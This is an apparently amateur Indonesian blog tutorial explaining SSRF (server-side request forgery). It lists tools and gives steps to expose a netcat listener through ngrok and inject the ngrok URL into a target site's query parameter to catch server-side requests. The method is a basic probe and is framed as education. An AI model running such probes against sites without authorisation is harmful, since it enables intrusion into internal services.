Apa Itu Bug SSRF???

Halo Teman²

Gimana Kabarnya Baik???,,,Oke Aku akan menjelaskan apa itu SSRF

SSRF Kepanjangan Dari Server Side Request Forgery. Kerentanan ini Adalah Untuk Memanfaatkan Melakukan Serangan Request...SSRF Dibagi Menjadi 2 Bagian Yaitu Internal & Eksternal...

1. Eksternal

Nah ini adalah Contoh kerentanan Eksternal... Kerentanan Ini Tidak Berdampak Buruk Tentang Informasi Sensitif 

2. Internal

Sedangkan Internal Kerentanannya bisa berdapak Buruk Dapat Membawa Data Informasi Sensitif.

Nah Cara Melakukan Pentest Tersebut Cukup Memerlukan Bantuan Tools...

Nah apa saja

1. Netcat

2. Curl

3. Browser Chrome & FireFox

4. Burpsuite/Khusus User Android Bisa pakai Capture Data Seperti ; HTTP Cannary Atau Sandro Proxy

5. Ngrok Fungsinya Sebagai Perantara Untuk Menangkap Request ke Netcat

Langkah² Untuk Melakukan SSRF Saya Kasih Bagian Yang Simplenya aja Oke... oke Simak ;

1. Tools Yang Anda Butuh kan Ngrok & Netcat.

2. Oke Langkah Pertama Nyalakan Ngrok Dengan perintah ./ngrok http 1337

3. Setelah sudah menyala Ngroknya,,,Langkah Selanjutnya Kita Sambungkan Ke Netcat dengan perintah nc -nvlp 1337

4. Ingat portnya harus sama tidak boleh beda,,,Oke langkah selanjutnya adalah buka browser,,,Salin Link ngroknya....Lalu Tempelkan ke path website....

Contoh : https://target.com/?s=http://5273-r514-521.ngrok.oi

5. Maka akan tertangkap request bisa internal atau eksternal

Sebenarnya banyak metode yang di lakukan,,,Tetapi saya kasih cara yang mudah di pahami saja...

Oke segitu saja yang bisa saya jelaskan kepada anda semua,,,Semoga Bermanfaat,,,Dan Ini hanya Untuk Edukasi saja...

Sekian 

Terima kasih....